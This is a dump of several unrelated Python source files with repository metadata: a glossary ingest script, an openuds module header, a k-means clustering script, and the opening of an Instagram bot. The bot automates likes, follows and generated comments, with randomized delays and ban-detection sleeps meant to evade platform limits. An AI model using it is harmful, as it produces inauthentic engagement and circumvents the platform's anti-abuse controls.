def process_glossary_data(data):
    """
    Process a glossary and link the entries to their instances.

    Glossary entries arrive in a nested format; each is flattened via
    process_entry() and joined with its instances via its "xis" reference,
    then the glossary-wide base fields are merged in.

    Entries referring to non-existent instances are skipped with a warning.

    :param data: a dictionary representing a glossary, including the instances.
    :return: a list of entries, flattened and linked to instances when possible.
    """
    instances = data["instances"]
    shared_fields = {key: data[key] for key in base_fields}
    processed = []
    for raw_entry in data["entries"]:
        flat_entry = process_entry(raw_entry)
        # Link the top-level instance reference (not per-sense/norm/etc.).
        # A missing instance indicates a malformed glossary; warn and skip.
        try:
            flat_entry["instances"] = instances[raw_entry["xis"]]
        except KeyError:
            warnings.warn(
                "Could not find the instance {} for entry {}!".format(
                    raw_entry["xis"], raw_entry["headword"])
            )
            continue
        flat_entry.update(shared_fields)
        processed.append(flat_entry)
    return processed
def preprocess_glossary(glossary_filename):
    """Remove unused fields from a glossary and return it as a dictionary.

    Runs the external ``jq`` tool with the ingest/remove_unused.jq filter so
    that very large glossary files are slimmed down before being parsed
    into memory.

    :param glossary_filename: path to the glossary JSON file.
    :return: the filtered glossary parsed into a dictionary.
    :raises RuntimeError: if the jq executable cannot be run.
    """
    filter_file = os.path.join("ingest", "remove_unused.jq")
    try:
        s = subprocess.run(
            ["jq", "-f", filter_file, glossary_filename],
            stdout=subprocess.PIPE
        )
    except FileNotFoundError as e:
        # If the jq executable is not found, a FileNotFoundError is raised;
        # re-raise as RuntimeError so callers can fall back gracefully.
        raise RuntimeError('Could not run jq command.') from e
    # We need to decode the captured stdout bytes to a string before parsing.
    return json.loads(s.stdout.decode("utf8"))
def process_file(input_name, write_file=True):
    """
    Process all entries in a glossary file, extracting the common information to
    create entries that can be individually indexed. Optionally create a new
    file with the entries that can be uploaded manually.

    :param input_name: the name of the glossary JSON file
    :param write_file: whether to write the entries in a new file, to be used later
    :return: a list of the new individual entries, as dictionaries
    """
    # The glossaries contain a lot of information that we do not use.
    # Sometimes this can make them too large to load in memory. Therefore,
    # we first preprocess each file to remove the fields we do not need.
    try:
        data = preprocess_glossary(input_name)
    except RuntimeError:
        # If the preprocessing fails (most likely reason is that the jq tool
        # is not present), try to read the file normally as a last resort.
        warnings.warn(
            "Could not preprocess file {}. Is jq installed?\n"
            "Will attempt to ingest without preprocessing."
            "This may fail for large glossaries.".format(input_name),
            RuntimeWarning
        )
        with open(input_name, 'r') as input_file:
            data = json.load(input_file)
    new_entries = Reprocess_glossary_data_result = process_glossary_data(data)
    if write_file:
        # Write Elasticsearch bulk-upload format: an action line carrying the
        # document _id, followed by the document itself, for every entry.
        output_name = input_name.rsplit('.', 1)[0] + "-entries.json"
        with open(output_name, 'w') as outfile:
            for new_entry in new_entries:
                header = '{ "index" : { "_id" : "' + new_entry["id"] + '" } }'
                print(header, file=outfile)
                print(json.dumps(new_entry), file=outfile)
    print("Finished processing {}".format(input_name))
    return new_entries
if __name__ == "__main__":
    # CLI usage: python break_down.py <glossary.json>
    process_file(sys.argv[1])
| [
"a.georgoulas@ucl.ac.uk"
] | a.georgoulas@ucl.ac.uk |
e82f2bd71cc0846186353d8c20817723d286fc4f | 4d4fcde3efaa334f7aa56beabd2aa26fbcc43650 | /server/src/uds/reports/lists/__init__.py | 2cb963d21ee727e9b5b0bcc891ec8e5716d7db72 | [] | no_license | xezpeleta/openuds | a8b11cb34eb0ef7bb2da80f67586a81b2de229ef | 840a7a02bd7c9894e8863a8a50874cdfdbf30fcd | refs/heads/master | 2023-08-21T17:55:48.914631 | 2021-10-06T10:39:06 | 2021-10-06T10:39:06 | 414,489,331 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,712 | py | # -*- coding: utf-8 -*-
#
# Copyright (c) 2015-2020 Virtual Cable S.L.U.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of Virtual Cable S.L. nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
@author: Adolfo Gómez, dkmaster at dkmon dot com
"""
# Make reports visible to autoloader
from . import users
| [
"dkmaster@dkmon.com"
] | dkmaster@dkmon.com |
326d8619cb7051110fe5797a4c857b43a2ce39ff | 4f822a3bfadf6d8cb8a842a9dcd6689d5cd99b8f | /testing4/a1.py | cea6ddea707213f88d15a408c14195bc3078fd05 | [] | no_license | ashishsingh14/Machine-Learning | 71e148fdcc0695ed8c71014674f44ca41001285f | 0e6830b229fd39c5540b1866e8bb4400ac785950 | refs/heads/master | 2020-05-29T16:40:42.469253 | 2016-04-30T08:03:02 | 2016-04-30T08:03:02 | 56,255,204 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,951 | py | import sys, os
from sklearn import cluster
import numpy as np
from matplotlib import pyplot
import matplotlib.dates as mdates
from datetime import datetime
from math import sqrt
import pandas as pd
from operator import itemgetter
from mpl_toolkits.mplot3d import Axes3D
def plotrelationships():
    """Plot visit counts, prescriptions and weather variables over time.

    Reads columns from sample1.csv and shows one figure for the chosen
    row slice (currently rows 549+ -- year 2003). Nothing is returned.

    NOTE(review): column meanings below are inferred from variable names;
    confirm against sample1.csv's header.
    """
    days = np.genfromtxt("sample1.csv", dtype=None, delimiter=',', unpack=True, usecols=(0,), skip_header=1)
    milvisits = np.genfromtxt("sample1.csv", dtype=None, delimiter=',', unpack=True, usecols=(16,), skip_header=1)
    civvisits = np.genfromtxt("sample1.csv", dtype=None, delimiter=',', unpack=True, usecols=(18,), skip_header=1)
    prescriptions = np.genfromtxt("sample1.csv", dtype=None, delimiter=',', unpack=True, usecols=(17,), skip_header=1)
    dewpoint = np.genfromtxt("sample1.csv", dtype=None, delimiter=',', unpack=True, usecols=(23,), skip_header=1)
    wetbulb = np.genfromtxt("sample1.csv", dtype=None, delimiter=',', unpack=True, usecols=(24,), skip_header=1)
    avgtemp = np.genfromtxt("sample1.csv", dtype=None, delimiter=',', unpack=True, usecols=(21,), skip_header=1)
    # NOTE(review): isweekend is loaded but never plotted in this function.
    isweekend = np.genfromtxt("sample1.csv", dtype=None, delimiter=',', unpack=True, usecols=(43,), skip_header=1)
    # Parse the quoted "Mon-DD-YYYY" date strings into datetime objects.
    modified_days = []
    for element in days:
        y = element.strip('"')
        modified_days.append(datetime.strptime(y, "%b-%d-%Y"))
    modified_nd = np.asarray(modified_days)
    #print modified_nd
    # Row slices used while exploring different years:
    # range 2-185 186-550 551-701 0-184 184:549 549: [549:]
    pyplot.plot(modified_days[549:], milvisits[549:],'b')
    pyplot.plot(modified_days[549:], civvisits[549:], 'r')
    pyplot.plot(modified_days[549:], prescriptions[549:], 'g')
    pyplot.plot(modified_days[549:], avgtemp[549:] , 'k')
    pyplot.plot(modified_days[549:], wetbulb[549:], 'c')
    pyplot.plot(modified_days[549:], dewpoint[549:], 'm')
    pyplot.title("Showing Variations for Year 2003")
    pyplot.ylabel("Variation of different parameters --->")
    #pyplot.text("shosss")
    pyplot.xlabel("Time --->")
    pyplot.grid(True)
    pyplot.show()
    #pyplot.savefig("figure-2003", facecolor='w', edgecolor='w', transparent=False, pad_inches=0.5, bbox_inches='tight')
    #pyplot.clf()
def generatedata():
    """Load selected columns of sample1.csv and return the feature matrix.

    Returns an (n_samples, 7) array whose columns are, in order:
    isweekend, milvisits, prescriptions, civvisits, avgtemp, dewpoint,
    wetbulb.

    NOTE(review): this function reads columns 13/14/15 for visits and
    prescriptions while plotrelationships() reads 16/17/18 -- confirm
    which set is intended.
    """
    #data = np.genfromtxt("sample1.csv", dtype=None, delimiter=',', unpack=True, usecols=(16,17,18,21,23,24,25), skip_header=1) #(13,14,15,21,23,24,35)
    days = np.genfromtxt("sample1.csv", dtype=None, delimiter=',', unpack=True, usecols=(0,), skip_header=1)
    milvisits = np.genfromtxt("sample1.csv", dtype=None, delimiter=',', unpack=True, usecols=(13,), skip_header=1)
    civvisits = np.genfromtxt("sample1.csv", dtype=None, delimiter=',', unpack=True, usecols=(15,), skip_header=1)
    prescriptions = np.genfromtxt("sample1.csv", dtype=None, delimiter=',', unpack=True, usecols=(14,), skip_header=1)
    dewpoint = np.genfromtxt("sample1.csv", dtype=None, delimiter=',', unpack=True, usecols=(23,), skip_header=1)
    wetbulb = np.genfromtxt("sample1.csv", dtype=None, delimiter=',', unpack=True, usecols=(24,), skip_header=1)
    avgtemp = np.genfromtxt("sample1.csv", dtype=None, delimiter=',', unpack=True, usecols=(21,), skip_header=1)
    isweekend = np.genfromtxt("sample1.csv", dtype=None, delimiter=',', unpack=True, usecols=(43,), skip_header=1)
    #sealevel = np.genfromtxt("sample1.csv", dtype=None, delimiter=',', unpack=True, usecols=(33,), skip_header=1)
    # Parse dates to epoch seconds.
    # NOTE(review): modified_days is computed but never added to data1, so
    # the date column is not part of the returned matrix.
    modified_days = []
    for element in days:
        y = element.strip('"')
        modified_days.append(datetime.strptime(y, "%b-%d-%Y"))
    for i in range(len(modified_days)):
        modified_days[i] = (int)(modified_days[i].strftime('%s'))
    # Assemble columns, then transpose so rows are samples.
    data1 = []
    #data1.append(modified_days)
    data1.append(isweekend)
    data1.append(milvisits)
    data1.append(prescriptions)
    data1.append(civvisits)
    data1.append(avgtemp)
    data1.append(dewpoint)
    data1.append(wetbulb)
    #data1.append(sealevel)
    data = np.transpose(data1)
    print data[1]
    return data
def kmeans(data, clusters):  # clusters=7 works well for this data set
    """Run k-means on `data`, plot the clusters in 3-D and report anomalies.

    The smallest cluster is treated as the anomaly cluster (plotted black
    and listed first); the largest cluster is reported as "normal".

    :param data: 2-D array-like of samples; columns 1, 2 and 4 are plotted
        (visits, prescriptions, average temperature).
    :param clusters: number of clusters to fit (the `colors` palette below
        supports up to 7).
    :return: list with the number of points assigned to each cluster.
    """
    kmeans = cluster.KMeans(n_clusters=clusters)
    kmeans.fit(data)
    labels = kmeans.labels_
    centroids = kmeans.cluster_centers_
    # Fix: print() with two arguments showed a tuple like
    # ('Number of unique clusters are: %d', 7); format into one string.
    print("Number of unique clusters are: %d" % clusters)
    fig = pyplot.figure()
    ax = fig.add_subplot(111, projection='3d')
    # Count how many samples fell into each cluster.
    points_per_cluster = [0 for _ in range(clusters)]
    for i in range(len(data)):
        points_per_cluster[labels[i]] = points_per_cluster[labels[i]] + 1
    print("Points per cluster\n")
    print(points_per_cluster)
    colors = ["g", "r", "c", "y", "b", "m", "w"]
    # Smallest cluster -> anomalies (index1); largest -> normal (index2).
    # Fix: the original scan used `elif`, so whenever the minimum updated
    # the maximum check was skipped for that element.
    index1 = min(range(len(points_per_cluster)), key=points_per_cluster.__getitem__)
    index2 = max(range(len(points_per_cluster)), key=points_per_cluster.__getitem__)
    for i in range(len(data)):
        if labels[i] == index1:
            # Anomaly cluster drawn in black.
            ax.scatter(data[i][1], data[i][2], data[i][4], zdir='z', c='k')
        else:
            ax.scatter(data[i][1], data[i][2], data[i][4], zdir='z', c=colors[labels[i]])
    ax.scatter(centroids[:, 1], centroids[:, 2], centroids[:, 4], zdir='z',
               marker="x", s=200, linewidths=5, zorder=10)
    ax.set_xlabel('Resp Visits')
    ax.set_ylabel('Prescriptions')
    ax.set_zlabel('Average Temperature')
    pyplot.show()
    print("\nCluster Showing Anomalies:\n")
    for i in range(len(data)):
        if labels[i] == index1:
            print(data[i])
    print("\nNormal Cluster:\n")
    for i in range(len(data)):
        if labels[i] == index2:
            print(data[i])
    # Fix: the original returned the misspelled name `points_per_cluste`,
    # which raised NameError.
    return points_per_cluster
def meanshift(data):
    """Cluster `data` with MeanShift and print the clusters found.

    Prints the cluster count, the per-sample labels, and the first two
    coordinates of each cluster centre. Nothing is returned.
    """
    ms = cluster.MeanShift()
    ms.fit(data)
    labels = ms.labels_
    cluster_centers = ms.cluster_centers_
    labels_unique = np.unique(labels)
    n_clusters_ = len(labels_unique)
    # Fix: print() with two arguments showed a tuple instead of the
    # formatted message; format into one string.
    print("Number of unique clusters are: %d" % n_clusters_)
    print(labels)
    for i in range(len(cluster_centers)):
        # Same output as the Python-2 `print a, b` statement, but valid
        # under both Python 2 and 3.
        print("%s %s" % (cluster_centers[i][0], cluster_centers[i][1]))
    print("\n")
if __name__=="__main__":
    # Load the feature matrix from sample1.csv and run k-means with 7
    # clusters (empirically a good value for this data set).
    data = generatedata()
    kmeans(data, 7)
    #points_per_cluster = kmeans(data, 7)
    #kmeans(data,5)
    # Disabled experiment (kept inside a string literal): sweep cluster
    # counts 3..20 and plot the variance of cluster sizes per count.
    """
    clusters = []
    variances = []
    for i in range(3,21): # cluster = 5 is good for resp
        points_per_cluster = kmeans(data, i)
        variances.append(np.var(points_per_cluster))
        clusters.append(i)
    print "data obtained"
    print clusters
    print variances
    variances[4] = 4012.2112
    pyplot.plot(clusters, variances)
    pyplot.title("Showing Variation of Variance with Total Clusters")
    pyplot.xlabel("No of Clusters -->")
    pyplot.ylabel("Variance -->")
    pyplot.show()
    plotrelationships()"""
| [
"ashish.iitr2015@gmail.com"
] | ashish.iitr2015@gmail.com |
3ab2ab497849cf95c4e137ee698165d20cbe687f | 1939f5b78e6dbd0675f6f2a9a0f4f49c2b069389 | /instagram/src/instabot.py | 91bd65f0544dd187a1655c570d6dcb9774751ecf | [
"MIT"
] | permissive | pavel-malin/instagram | cb7988d9fbfad14911bf39567f7b2f6336b1fb34 | b53f00c20521f46f5836946a499f476859d431f5 | refs/heads/master | 2021-03-16T07:54:57.942684 | 2017-11-20T11:23:46 | 2017-11-20T11:23:46 | 111,401,293 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 36,349 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import atexit
import datetime
import itertools
import json
import logging
import random
import signal
import sys
if 'threading' in sys.modules:
del sys.modules['threading']
import time
import requests
from unfollow_protocol import unfollow_protocol
from userinfo import UserInfo
class InstaBot:
"""
Instagram bot v 1.1.0
like_per_day=1000 - How many likes set bot in one day.
media_max_like=0 - Don't like media (photo or video) if it have more than
media_max_like likes.
media_min_like=0 - Don't like media (photo or video) if it have less than
media_min_like likes.
tag_list = ['cat', 'car', 'dog'] - Tag list to like.
max_like_for_one_tag=5 - Like 1 to max_like_for_one_tag times by row.
log_mod = 0 - Log mod: log_mod = 0 log to console, log_mod = 1 log to file,
log_mod = 2 no log.
https://github.com/LevPasha/instabot.py
"""
url = 'https://www.instagram.com/'
url_tag = 'https://www.instagram.com/explore/tags/%s/?__a=1'
url_likes = 'https://www.instagram.com/web/likes/%s/like/'
url_unlike = 'https://www.instagram.com/web/likes/%s/unlike/'
url_comment = 'https://www.instagram.com/web/comments/%s/add/'
url_follow = 'https://www.instagram.com/web/friendships/%s/follow/'
url_unfollow = 'https://www.instagram.com/web/friendships/%s/unfollow/'
url_login = 'https://www.instagram.com/accounts/login/ajax/'
url_logout = 'https://www.instagram.com/accounts/logout/'
url_media_detail = 'https://www.instagram.com/p/%s/?__a=1'
url_user_detail = 'https://www.instagram.com/%s/?__a=1'
user_agent = ("Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 "
"(KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36")
accept_language = 'ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4'
# If instagram ban you - query return 400 error.
error_400 = 0
# If you have 3 400 error in row - looks like you banned.
error_400_to_ban = 3
# If InstaBot think you are banned - going to sleep.
ban_sleep_time = 2 * 60 * 60
# All counter.
bot_mode = 0
like_counter = 0
follow_counter = 0
unfollow_counter = 0
comments_counter = 0
current_user = 'hajka'
current_index = 0
current_id = 'abcds'
# List of user_id, that bot follow
bot_follow_list = []
user_info_list = []
user_list = []
ex_user_list = []
unwanted_username_list = []
is_checked = False
is_selebgram = False
is_fake_account = False
is_active_user = False
is_following = False
is_follower = False
is_rejected = False
is_self_checking = False
is_by_tag = False
is_follower_number = 0
self_following = 0
self_follower = 0
# Log setting.
log_file_path = ''
log_file = 0
# Other.
user_id = 0
media_by_tag = 0
media_on_feed = []
media_by_user = []
login_status = False
# For new_auto_mod
next_iteration = {"Like": 0, "Follow": 0, "Unfollow": 0, "Comments": 0}
def __init__(self,
             login,
             password,
             like_per_day=1000,
             media_max_like=50,
             media_min_like=0,
             follow_per_day=0,
             follow_time=5 * 60 * 60,
             unfollow_per_day=0,
             comment_list=None,
             comments_per_day=0,
             tag_list=None,
             max_like_for_one_tag=5,
             unfollow_break_min=15,
             unfollow_break_max=30,
             log_mod=0,
             proxy="",
             user_blacklist=None,
             tag_blacklist=None,
             unwanted_username_list=None,
             unfollow_whitelist=None):
    """Configure the bot, open a requests session and log in immediately.

    Rates (*_per_day) of 0 disable that activity.  `log_mod`: 0 = console,
    1 = file.  Mutable defaults are now created per instance: the old
    signature shared one list/dict object between every InstaBot, so e.g.
    random.shuffle(self.tag_list) in auto_mod mutated the default for all
    future instances.
    """
    if comment_list is None:
        comment_list = [["this", "the", "your"],
                        ["photo", "picture", "pic", "shot", "snapshot"],
                        ["is", "looks", "feels", "is really"],
                        ["great", "super", "good", "very good", "good",
                         "wow", "WOW", "cool", "GREAT", "magnificent",
                         "magical", "very cool", "stylish", "beautiful",
                         "so beautiful", "so stylish", "so professional",
                         "lovely", "so lovely", "very lovely", "glorious",
                         "so glorious", "very glorious", "adorable",
                         "excellent", "amazing"],
                        [".", "..", "...", "!", "!!", "!!!"]]
    if tag_list is None:
        tag_list = ['cat', 'car', 'dog']
    if user_blacklist is None:
        user_blacklist = {}
    if tag_blacklist is None:
        tag_blacklist = []
    if unwanted_username_list is None:
        unwanted_username_list = []
    if unfollow_whitelist is None:
        unfollow_whitelist = []
    self.bot_start = datetime.datetime.now()
    self.unfollow_break_min = unfollow_break_min
    self.unfollow_break_max = unfollow_break_max
    self.user_blacklist = user_blacklist
    self.tag_blacklist = tag_blacklist
    self.unfollow_whitelist = unfollow_whitelist
    self.comment_list = comment_list
    self.time_in_day = 24 * 60 * 60
    # Convert per-day rates into per-action delays (seconds).
    self.like_per_day = like_per_day
    if self.like_per_day != 0:
        self.like_delay = self.time_in_day / self.like_per_day
    self.follow_time = follow_time
    self.follow_per_day = follow_per_day
    if self.follow_per_day != 0:
        self.follow_delay = self.time_in_day / self.follow_per_day
    self.unfollow_per_day = unfollow_per_day
    if self.unfollow_per_day != 0:
        self.unfollow_delay = self.time_in_day / self.unfollow_per_day
    self.comments_per_day = comments_per_day
    if self.comments_per_day != 0:
        self.comments_delay = self.time_in_day / self.comments_per_day
    # Don't like if media have more than n likes.
    self.media_max_like = media_max_like
    # Don't like if media have less than n likes.
    self.media_min_like = media_min_like
    # Default list of tag.
    self.tag_list = tag_list
    # Get random tag, from tag_list, and like (1 to n) times.
    self.max_like_for_one_tag = max_like_for_one_tag
    # log_mod 0 to console, 1 to file
    self.log_mod = log_mod
    self.s = requests.Session()
    # Optional proxy, e.g. "1.2.3.4:8080" (by @ageorgios).
    if proxy != "":
        proxies = {
            'http': 'http://' + proxy,
            'https': 'http://' + proxy,
        }
        self.s.proxies.update(proxies)
    # convert login to lower
    self.user_login = login.lower()
    self.user_password = password
    self.bot_mode = 0
    self.media_by_tag = []
    self.media_on_feed = []
    self.media_by_user = []
    self.unwanted_username_list = unwanted_username_list
    now_time = datetime.datetime.now()
    log_string = 'Instabot v1.1.0 started at %s:\n' % \
                 (now_time.strftime("%d.%m.%Y %H:%M"))
    self.write_log(log_string)
    self.login()
    self.populate_user_blacklist()
    # Make sure bot-followed accounts are unfollowed and we log out on exit.
    signal.signal(signal.SIGTERM, self.cleanup)
    atexit.register(self.cleanup)
def populate_user_blacklist(self):
    """Resolve each blacklisted username to its numeric Instagram ID.

    Replaces each value in ``self.user_blacklist`` (username -> id) so the
    later owner-id comparisons in like_all_exist_media are direct.  Deleted
    or invalid accounts are logged and skipped.
    """
    for user in self.user_blacklist:
        user_id_url = self.url_user_detail % (user)
        info = self.s.get(user_id_url)
        # The profile endpoint returns non-JSON for deleted/invalid
        # accounts.  json.JSONDecodeError subclasses ValueError, so this
        # needs no per-iteration `from json import ...` (the old code
        # re-imported inside the loop, which was also Python-2 hostile).
        try:
            all_data = json.loads(info.text)
        except ValueError:
            self.write_log('Account of user %s was deleted or link is '
                           'invalid' % (user))
        else:
            id_user = all_data['user']['id']
            # Update the user_name with the user_id
            self.user_blacklist[user] = id_user
            log_string = "Blacklisted user %s added with ID: %s" % (user,
                                                                    id_user)
            self.write_log(log_string)
            # Jitter between profile fetches to look less bot-like.
            time.sleep(5 * random.random())
def login(self):
    """Authenticate the session; set self.login_status and self.user_id."""
    log_string = 'Trying to login as %s...\n' % (self.user_login)
    self.write_log(log_string)
    # Seed the cookies/headers Instagram's AJAX login endpoint expects.
    self.s.cookies.update({
        'sessionid': '',
        'mid': '',
        'ig_pr': '1',
        'ig_vw': '1920',
        'csrftoken': '',
        's_network': '',
        'ds_user_id': ''
    })
    self.login_post = {
        'username': self.user_login,
        'password': self.user_password
    }
    self.s.headers.update({
        'Accept-Encoding': 'gzip, deflate',
        'Accept-Language': self.accept_language,
        'Connection': 'keep-alive',
        'Content-Length': '0',
        'Host': 'www.instagram.com',
        'Origin': 'https://www.instagram.com',
        'Referer': 'https://www.instagram.com/',
        'User-Agent': self.user_agent,
        'X-Instagram-AJAX': '1',
        'X-Requested-With': 'XMLHttpRequest'
    })
    # Fetch the landing page first to obtain a CSRF token.
    r = self.s.get(self.url)
    self.s.headers.update({'X-CSRFToken': r.cookies['csrftoken']})
    time.sleep(5 * random.random())
    login = self.s.post(
        self.url_login, data=self.login_post, allow_redirects=True)
    self.s.headers.update({'X-CSRFToken': login.cookies['csrftoken']})
    self.csrftoken = login.cookies['csrftoken']
    time.sleep(5 * random.random())
    if login.status_code == 200:
        # A 200 does not guarantee success: confirm the username appears
        # in the home page, i.e. we are actually logged in.
        r = self.s.get('https://www.instagram.com/')
        finder = r.text.find(self.user_login)
        if finder != -1:
            # NOTE(review): UserInfo is defined elsewhere in this project.
            ui = UserInfo()
            self.user_id = ui.get_user_id_by_login(self.user_login)
            self.login_status = True
            log_string = '%s login success!' % (self.user_login)
            self.write_log(log_string)
        else:
            self.login_status = False
            self.write_log('Login error! Check your login data!')
    else:
        self.write_log('Login error! Connection error!')
def logout(self):
    """Log the session out of Instagram and report run statistics."""
    log_string = 'Logout: likes - %i, follow - %i, unfollow - %i, comments - %i.' % \
                 (self.like_counter, self.follow_counter,
                  self.unfollow_counter, self.comments_counter)
    self.write_log(log_string)
    work_time = datetime.datetime.now() - self.bot_start
    log_string = 'Bot work time: %s' % (work_time)
    self.write_log(log_string)
    # Only the POST can raise here; catch network errors specifically
    # instead of the old bare `except:` (which also swallowed KeyboardInterrupt).
    try:
        logout_post = {'csrfmiddlewaretoken': self.csrftoken}
        self.s.post(self.url_logout, data=logout_post)
        self.write_log("Logout success!")
        self.login_status = False
    except requests.exceptions.RequestException:
        self.write_log("Logout error!")
def cleanup(self, *_):
    """Exit handler: unfollow everyone the bot followed, log out, exit.

    Registered with atexit and as the SIGTERM handler (extra signal args
    are swallowed by *_).
    """
    # Unfollow all bot follow
    if self.follow_counter >= self.unfollow_counter:
        # NOTE(review): the list is mutated (remove) while being iterated;
        # with more than one entry some items may be skipped -- confirm.
        for f in self.bot_follow_list:
            log_string = "Trying to unfollow: %s" % (f[0])
            self.write_log(log_string)
            self.unfollow_on_cleanup(f[0])
            # Random pause between unfollows to avoid rate limiting.
            sleeptime = random.randint(self.unfollow_break_min,
                                       self.unfollow_break_max)
            log_string = "Pausing for %i seconds... %i of %i" % (
                sleeptime, self.unfollow_counter, self.follow_counter)
            self.write_log(log_string)
            time.sleep(sleeptime)
            self.bot_follow_list.remove(f)
    # Logout
    if (self.login_status):
        self.logout()
    exit(0)
def get_media_id_by_tag(self, tag):
    """ Get media ID set, by your hashtag """
    # Fills self.media_by_tag with media nodes for *tag*; resets it to []
    # on any fetch/parse failure.  Requires a logged-in session.
    if (self.login_status):
        log_string = "Get media id by tag: %s" % (tag)
        self.write_log(log_string)
        if self.login_status == 1:
            url_tag = self.url_tag % (tag)
            try:
                r = self.s.get(url_tag)
                all_data = json.loads(r.text)
                self.media_by_tag = list(all_data['tag']['media']['nodes'])
            except:
                # Network error or unexpected JSON layout.
                self.media_by_tag = []
                self.write_log("Except on get_media!")
        else:
            return 0
def like_all_exist_media(self, media_size=-1, delay=True):
    """ Like all media ID that have self.media_by_tag """
    # Likes up to *media_size* items (-1 = all) from self.media_by_tag,
    # skipping blacklisted owners/tags and our own media.  Returns False
    # on the first refusal/error, True when delay=False and a like
    # succeeded.  (Indentation reconstructed from a whitespace-mangled
    # source.)
    if self.login_status:
        if self.media_by_tag != 0:
            i = 0
            for d in self.media_by_tag:
                # Media count by this tag.
                # NOTE(review): `media_size > 0 or media_size < 0` is just
                # `media_size != 0` -- the loop stops once the budget hits 0.
                if media_size > 0 or media_size < 0:
                    media_size -= 1
                    l_c = self.media_by_tag[i]['likes']['count']
                    # Like only when the like count is inside the configured
                    # window; a bound of 0 disables that side of the check.
                    if ((l_c <= self.media_max_like and
                         l_c >= self.media_min_like) or
                        (self.media_max_like == 0 and
                         l_c >= self.media_min_like) or
                        (self.media_min_like == 0 and
                         l_c <= self.media_max_like) or
                        (self.media_min_like == 0 and
                         self.media_max_like == 0)):
                        # Skip (and abort) for blacklisted owners.
                        for blacklisted_user_name, blacklisted_user_id in self.user_blacklist.items(
                        ):
                            if self.media_by_tag[i]['owner'][
                                    'id'] == blacklisted_user_id:
                                self.write_log(
                                    "Not liking media owned by blacklisted user: "
                                    + blacklisted_user_name)
                                return False
                        if self.media_by_tag[i]['owner'][
                                'id'] == self.user_id:
                            self.write_log(
                                "Keep calm - It's your own media ;)")
                            return False
                        # Extract #hashtags from the caption and refuse to
                        # like when any intersects the tag blacklist.
                        try:
                            caption = self.media_by_tag[i][
                                'caption'].encode(
                                    'ascii', errors='ignore')
                            tag_blacklist = set(self.tag_blacklist)
                            if sys.version_info[0] == 3:
                                tags = {
                                    str.lower(
                                        (tag.decode('ASCII')).strip('#'))
                                    for tag in caption.split()
                                    if (tag.decode('ASCII')
                                        ).startswith("#")
                                }
                            else:
                                tags = {
                                    unicode.lower(
                                        (tag.decode('ASCII')).strip('#'))
                                    for tag in caption.split()
                                    if (tag.decode('ASCII')
                                        ).startswith("#")
                                }
                            if tags.intersection(tag_blacklist):
                                matching_tags = ', '.join(
                                    tags.intersection(tag_blacklist))
                                self.write_log(
                                    "Not liking media with blacklisted tag(s): "
                                    + matching_tags)
                                return False
                        except:
                            # Missing caption key (or encode failure).
                            self.write_log(
                                "Couldn't find caption - not liking")
                            return False
                        log_string = "Trying to like media: %s" % \
                                     (self.media_by_tag[i]['id'])
                        self.write_log(log_string)
                        like = self.like(self.media_by_tag[i]['id'])
                        # comment = self.comment(self.media_by_tag[i]['id'], 'Cool!')
                        # follow = self.follow(self.media_by_tag[i]["owner"]["id"])
                        if like != 0:
                            if like.status_code == 200:
                                # Like, all ok!
                                self.error_400 = 0
                                self.like_counter += 1
                                log_string = "Liked: %s. Like #%i." % \
                                             (self.media_by_tag[i]['id'],
                                              self.like_counter)
                                self.write_log(log_string)
                            elif like.status_code == 400:
                                log_string = "Not liked: %i" \
                                             % (like.status_code)
                                self.write_log(log_string)
                                # Some error. If repeated - can be ban!
                                if self.error_400 >= self.error_400_to_ban:
                                    # Look like you banned!
                                    time.sleep(self.ban_sleep_time)
                                else:
                                    self.error_400 += 1
                            else:
                                log_string = "Not liked: %i" \
                                             % (like.status_code)
                                self.write_log(log_string)
                                return False
                            # Some error.
                            i += 1
                            if delay:
                                time.sleep(self.like_delay * 0.9 +
                                           self.like_delay * 0.2 *
                                           random.random())
                            else:
                                return True
                        else:
                            return False
                    else:
                        return False
                else:
                    return False
        else:
            self.write_log("No media to like!")
def like(self, media_id):
    """Send the HTTP POST that likes media *media_id*.

    Returns the requests.Response on an attempted like, or 0 on error or
    when not logged in (callers test ``like != 0``).  The old version left
    the result unbound when self.login_status was falsy, so the return
    raised NameError; it also kept an unused ``last_liked_media_id`` local.
    """
    like = 0
    if self.login_status:
        url_likes = self.url_likes % (media_id)
        try:
            like = self.s.post(url_likes)
        except requests.exceptions.RequestException:
            self.write_log("Except on like!")
            like = 0
    return like
def unlike(self, media_id):
    """Send the HTTP POST that removes a like from media *media_id*.

    Returns the requests.Response, or 0 on error or when not logged in.
    The old version left ``unlike`` unbound when self.login_status was
    falsy, making the return raise NameError.
    """
    unlike = 0
    if self.login_status:
        url_unlike = self.url_unlike % (media_id)
        try:
            unlike = self.s.post(url_unlike)
